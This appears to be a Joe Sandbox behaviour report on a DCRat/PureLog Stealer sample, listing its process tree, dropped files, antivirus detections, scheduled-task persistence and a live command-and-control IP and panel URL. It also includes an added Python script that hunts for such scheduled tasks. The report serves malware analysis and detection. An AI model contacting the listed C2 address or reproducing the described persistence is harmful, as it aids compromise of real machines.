                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
Behavior Graph ID: 1569008 | Sample: file.exe | Start date: 05/12/2024 | Architecture: WINDOWS | Score: 100

Numbers in parentheses give the graph node id and, where the graph shows them, the count badges described in the legend above.

Signatures on the root node: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 12 other signatures.

Processes started from the root: file.exe (node 10; badges 3, 6), kahKUDRlEYHfKIalWlM.exe (node 14; badges 14, 21), svchost.exe (node 17), kahKUDRlEYHfKIalWlM.exe (node 19).

file.exe (node 10): dropped C:\...\chainportruntimeCrtMonitor.exe (PE32) and C:\...\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe (data); signature: Found many strings related to Crypto-Wallets (likely being stolen); started wscript.exe (node 21; badge 1).

kahKUDRlEYHfKIalWlM.exe (node 14): contacted 193.3.168.50 on ports 49734, 49740, 49741 (ARNES-NETAcademicandResearchNetworkofSloveniaSI, Denmark); dropped C:\Users\user\Desktop\vJIWLFOd.log (PE32), C:\Users\user\Desktop\pQfxiZJp.log (PE32), C:\Users\user\Desktop\jYCYFtEB.log (PE32) and 3 other malicious files; signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures.

svchost.exe (node 17): contacted 127.0.0.1 (unknown, unknown).

wscript.exe (node 21): signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found; started cmd.exe (node 24; badge 1).

cmd.exe (node 24): started chainportruntimeCrtMonitor.exe (node 26; badges 3, 14) and conhost.exe (node 30).

chainportruntimeCrtMonitor.exe (node 26): dropped C:\Users\user\Desktop\vCAeICGo.log (PE32), C:\Users\user\Desktop\aEtIhTbg.log (PE32), C:\Users\user\Desktop\ZlAIxOci.log (PE32) and 5 other malicious files; signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures; started cmd.exe (node 32; badge 1) and powershell.exe (node 35; badge 23).

cmd.exe (node 32): signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks; started conhost.exe (node 37), PING.EXE (node 39; badge 1), chcp.com (node 41; badge 1), kahKUDRlEYHfKIalWlM.exe (node 43).

powershell.exe (node 35): signature: Loading BitLocker PowerShell Module; started conhost.exe (node 45) and WmiPrvSE.exe (node 47).

Source | Detection | Scanner | Label | Link
file.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby |
file.exe | 100% | Avira | VBS/Runner.VPG |
file.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\MsContainer\chainportruntimeCrtMonitor.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\GYwcCMoE.log | 100% | Avira | TR/AVI.Agent.updqb |
C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe | 100% | Avira | VBS/Runner.VPG |
C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\aEtIhTbg.log | 100% | Avira | TR/AVI.Agent.updqb |
C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\Desktop\YuXIhBvf.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\vCAeICGo.log | 100% | Joe Sandbox ML | |
C:\MsContainer\chainportruntimeCrtMonitor.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\jYCYFtEB.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\WzsROUza.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\QRPSxHgy.log | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\pQfxiZJp.log | 100% | Joe Sandbox ML | |
C:\MsContainer\chainportruntimeCrtMonitor.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\GYwcCMoE.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\HnGdNOQQ.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\QRPSxHgy.log | 4% | ReversingLabs | |
C:\Users\user\Desktop\UFpBXUVk.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\WzsROUza.log | 4% | ReversingLabs | |
C:\Users\user\Desktop\YuXIhBvf.log | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Desktop\ZlAIxOci.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\aEtIhTbg.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\jYCYFtEB.log | 16% | ReversingLabs | |
C:\Users\user\Desktop\pQfxiZJp.log | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Desktop\vCAeICGo.log | 16% | ReversingLabs | |
C:\Users\user\Desktop\vJIWLFOd.log | 17% | ReversingLabs | |

No Antivirus matches

No Antivirus matches
Source | Detection | Scanner | Label | Link
https://.AppV. | 0% | Avira URL Cloud | safe |
http://www.fontbureau.com/designers/? | 0% | Avira URL Cloud | safe |
http://www.goodfont.co.kr | 0% | Avira URL Cloud | safe |
http://www.fontbureau.com/designersG | 0% | Avira URL Cloud | safe |
http://www.fontbureau.com/designers? | 0% | Avira URL Cloud | safe |
http://www.tiro.com | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe |
http://www.fontbureau.com/designers | 0% | Avira URL Cloud | safe |
http://www.sajatypeworks.com | 0% | Avira URL Cloud | safe |
http://www.typography.netD | 0% | Avira URL Cloud | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | Avira URL Cloud | safe |
http://www.galapagosdesign.com/DPlease | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe |
http://www.sakkal.com | 0% | Avira URL Cloud | safe |
http://www.urwpp.deDPlease | 0% | Avira URL Cloud | safe |
http://www.fonts.com | 0% | Avira URL Cloud | safe |
http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe |
http://www.sandoll.co.kr | 0% | Avira URL Cloud | safe |
http://www.fontbureau.com | 0% | Avira URL Cloud | safe |
http://193.3.168.50 | 0% | Avira URL Cloud | safe |
http://crl.ver) | 0% | Avira URL Cloud | safe |
http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalData | 0% | Avira URL Cloud | safe |
http://www.fontbureau.com/designers/frere-user.html | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn | 0% | Avira URL Cloud | safe |
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | Avira URL Cloud | safe |
http://www.fontbureau.com/designers8 | 0% | Avira URL Cloud | safe |
http://www.carterandcone.coml | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/ | 0% | Avira URL Cloud | safe |
http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php | 100% | Avira URL Cloud | malware |
                                  No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.dr | false | | high
http://www.fontbureau.com/designersG | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.dr | false | | high
http://www.fontbureau.com/designers/? | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/bThe | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000008.00000002.1829367283.000001D7001C9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://.AppV. | powershell.exe, 00000008.00000002.1831461508.000001D700585000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.18.dr, qmgr.db.18.dr | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.dr | false | | high
http://www.fontbureau.com/designers | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.typography.netD | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod.C: | edb.log.18.dr, qmgr.db.18.dr | false | | high
http://www.founder.com.cn/cn/cThe | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2 | edb.log.18.dr, qmgr.db.18.dr | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.dr | false | | high
https://contoso.com/ | powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.kr | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zhongyicts.com.cn | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | chainportruntimeCrtMonitor.exe, 00000004.00000002.1797177505.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1834436615.000001D767F61000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.3.168.50 | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003790000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003D00000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.00000000036DD000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003837000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.dr | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.dr | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.dr | false | | high
http://crl.ver) | svchost.exe, 00000012.00000002.2910150411.00000181EF800000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.dr | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalData | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.dr | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.1834436615.000001D767F61000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
193.3.168.50 | unknown | Denmark | 2107 | ARNES-NETAcademicandResearchNetworkofSloveniaSI | true
                                                                                          IP
                                                                                          127.0.0.1
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1569008
                                                                                          Start date and time:2024-12-05 10:52:06 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 54s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:23
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:file.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@25/44@0/2
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 50%
                                                                                          HCA Information:Failed
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target kahKUDRlEYHfKIalWlM.exe, PID 7264 because it is empty
                                                                                          • Execution Graph export aborted for target kahKUDRlEYHfKIalWlM.exe, PID 7644 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7972 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: file.exe
Time | Type | Description
04:53:09 | API Interceptor | 19x Sleep call for process: powershell.exe modified
04:53:16 | API Interceptor | 958070x Sleep call for process: kahKUDRlEYHfKIalWlM.exe modified
04:53:17 | API Interceptor | 2x Sleep call for process: svchost.exe modified
09:53:09 | Task Scheduler | Run new task: kahKUDRlEYHfKIalWlM path: "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"
09:53:10 | Task Scheduler | Run new task: kahKUDRlEYHfKIalWlMk path: "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"
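The timeline records the persistence this sample sets up: two scheduled tasks, named after the dropped binary, whose action runs it from the user's Temp directory. The Python below is an added example, not part of the Joe Sandbox report, of the corresponding hunt on a host. SAMPLE is constructed: it mimics a subset of the columns that `schtasks /query /fo CSV /v` prints on Windows, with the two task names and the path taken from the report and one benign built-in task for contrast. The list of user-writable directories and the "task named after its own executable" heuristic are my own choices; the directory rule is what flags a task, the name match is only added as supporting context.

```python
import csv
import io
import re

# Constructed sample of schtasks CSV output (a subset of the real verbose
# columns).  The two kahKUDRlEYHfKIalWlM tasks and their path come from the
# report's timeline; the defrag task stands in for the built-in tasks any
# Windows host carries.
SAMPLE = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User"
"DESKTOP-1","\kahKUDRlEYHfKIalWlM","Ready","user","""C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe""","user"
"DESKTOP-1","\kahKUDRlEYHfKIalWlMk","Ready","user","""C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe""","user"
"DESKTOP-1","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
'''

# Directories a legitimate scheduled task rarely executes from (my own list;
# compared case-insensitively).
USER_WRITABLE_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")

# Executable path at the start of a "Task To Run" value: optional surrounding
# quotes, then everything up to the first ".exe"; arguments after it are dropped.
_EXE = re.compile(r'^"?([^"]+?\.exe)"?', re.IGNORECASE)


def parse_schtasks_csv(text: str) -> list:
    """One dict per task, keyed by the CSV header names."""
    return list(csv.DictReader(io.StringIO(text)))


def executable_of(task_to_run: str) -> str:
    """Return just the executable path from a 'Task To Run' value."""
    m = _EXE.match(task_to_run.strip())
    return m.group(1) if m else task_to_run.strip()


def suspicious_tasks(tasks: list) -> list:
    """Return (TaskName, executable, reason) for tasks running from a
    user-writable directory."""
    hits = []
    for t in tasks:
        exe = executable_of(t["Task To Run"])
        lowered = exe.lower()
        reasons = [f"runs from {d}" for d in USER_WRITABLE_DIRS if d in lowered]
        if not reasons:
            continue
        # Supporting signal seen in the report: the task is named after its binary.
        stem = lowered.rsplit("\\", 1)[-1]
        if stem.endswith(".exe"):
            stem = stem[:-4]
        if stem and t["TaskName"].lower().lstrip("\\").startswith(stem):
            reasons.append("task name matches executable name")
        hits.append((t["TaskName"], exe, "; ".join(reasons)))
    return hits


if __name__ == "__main__":
    for name, exe, why in suspicious_tasks(parse_schtasks_csv(SAMPLE)):
        print(f"{name}\n    {exe}\n    {why}")
```

On a live Windows host, feed it the real output (`schtasks /query /fo CSV /v > tasks.csv`) instead of SAMPLE; the CSV parsing is the same. Note the second task name carries a trailing "k", so hunting by exact task name would miss it, whereas the directory rule catches both.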
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.3.168.50 | file.exe | malicious | DCRat, PureLog Stealer, zgRAT |
193.3.168.50 | file.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ARNES-NETAcademicandResearchNetworkofSloveniaSI | file.exe | malicious | DCRat, PureLog Stealer, zgRAT | 193.3.168.50
ARNES-NETAcademicandResearchNetworkofSloveniaSI | file.exe | malicious | DCRat, PureLog Stealer, zgRAT | 193.3.168.50
ARNES-NETAcademicandResearchNetworkofSloveniaSI | botnet.spc.elf | malicious | Mirai, Moobot | 193.2.192.103
ARNES-NETAcademicandResearchNetworkofSloveniaSI | loligang.spc.elf | malicious | Mirai | 88.200.25.137
ARNES-NETAcademicandResearchNetworkofSloveniaSI | arm.elf | malicious | Mirai, Moobot | 178.172.103.122
ARNES-NETAcademicandResearchNetworkofSloveniaSI | pjyhwsdgkl.elf | malicious | Unknown | 149.62.81.228
ARNES-NETAcademicandResearchNetworkofSloveniaSI | x86_64.nn.elf | malicious | Mirai, Okiru | 193.2.209.204
ARNES-NETAcademicandResearchNetworkofSloveniaSI | x86.elf | malicious | Unknown | 109.127.207.201
ARNES-NETAcademicandResearchNetworkofSloveniaSI | loligang.arm.elf | malicious | Mirai | 194.249.219.228
ARNES-NETAcademicandResearchNetworkofSloveniaSI | loligang.x86.elf | malicious | Mirai | 194.249.74.121
                                                                                              No context
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\Desktop\GYwcCMoE.logfile.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                00onP4lQDK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  hjgesadfseawd.exeGet hashmaliciousDCRatBrowse
                                                                                                    lfcdgbuksf.exeGet hashmaliciousDCRatBrowse
                                                                                                      kyhjasehs.exeGet hashmaliciousDCRatBrowse
                                                                                                        adjthjawdth.exeGet hashmaliciousDCRatBrowse
                                                                                                          qNdO4D18CF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            iN1fhAtzW2.exeGet hashmaliciousDCRatBrowse
